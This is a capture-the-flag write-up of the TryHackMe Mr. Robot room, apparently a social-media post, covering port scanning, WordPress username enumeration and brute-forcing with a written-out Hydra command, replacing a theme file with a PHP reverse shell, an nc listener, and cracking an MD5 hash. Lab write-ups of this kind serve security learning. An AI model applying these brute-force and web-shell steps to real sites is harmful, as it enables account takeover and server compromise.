TryHackMe: Mr. Robot CTF
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Difficulty: Medium
Room URL: https://tryhackme.com/room/mrrobot
Scanning
rustscan -a <IP>
It was known that port 80, 443 and 22 were running HTTP, HTTPS and SSH respectively.
Upon visiting the website we found some commands that can be run.
I used nikto tool to get additional details.
Then I ran gobuster to do some directory fuzzing.
Dashboard is special because there is admin panel login interface for WordPress website. Also check into robots.txt, which is also special for us.
Last one is first flag, visit into this and indicate your progress
fsociety.dic is a wordlist, which might will be useful while login into admin panel or dashboard of that website. So open and save it on the machine.
fsocity.dic contains wordlist which we can use to bruteforce username and password.
Exploiting
Now visiting into login interface, I try some random username and password it shows
/wp-login.php reveals us login panel of wordpress.
A key thing to note is that the website gives a different response when the username is incorrect compared to when the username is correct but the password is incorrect. This is a significant flaw.
We will exploit this flaw to first obtain the username and then the password.
To do this, enter any username and password, and intercept the request using Burp Suite.
The highlighted section is what we are concerned about. Using this part, we will brute force the username.
领英推荐
hydra -L fsocity.dic -p test {IP} http-post-form “/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username”
Here we found username Elliot.
When we enter the correct username but an incorrect password, the response is different.
Now that we have the username, let's brute force the password. You can use the Hydra tool for this with a similar command. In my case, Hydra was taking a very long time, so I switched to using WPScan.
And we got password
Username: Elliot, Password: ER28–0652
Let's log in with these credentials.
we have access to wordpress dashboard.
Out best step would be to inject or replace the php file to malicious one. So that when the website runs the php we get ourself reverse shell.For this i will be using php reverse shell from pentestmonkey https://github.com/pentestmonkey/php-reverse-shell
Click update file.
In you attacker machine make netcatlistner ready using nc -lnvp 1234 make sure to use same port.
Looking at the home directory of the robot user, we can see two files: key-2-of-3.txt and password.raw-md5.
We don’t have access to key-2-of-3.txt, but we can read password.raw-md5. Reading the password file reveals what looks like a username and an MD5 encrypted password:
decrypting the password reveals abcdefghijklmnopqrstuvwxyz
l
Lets switch user to robot.
I try searching on https://gtfobins.github.io/ and find its vulnerability.
Thanks for coming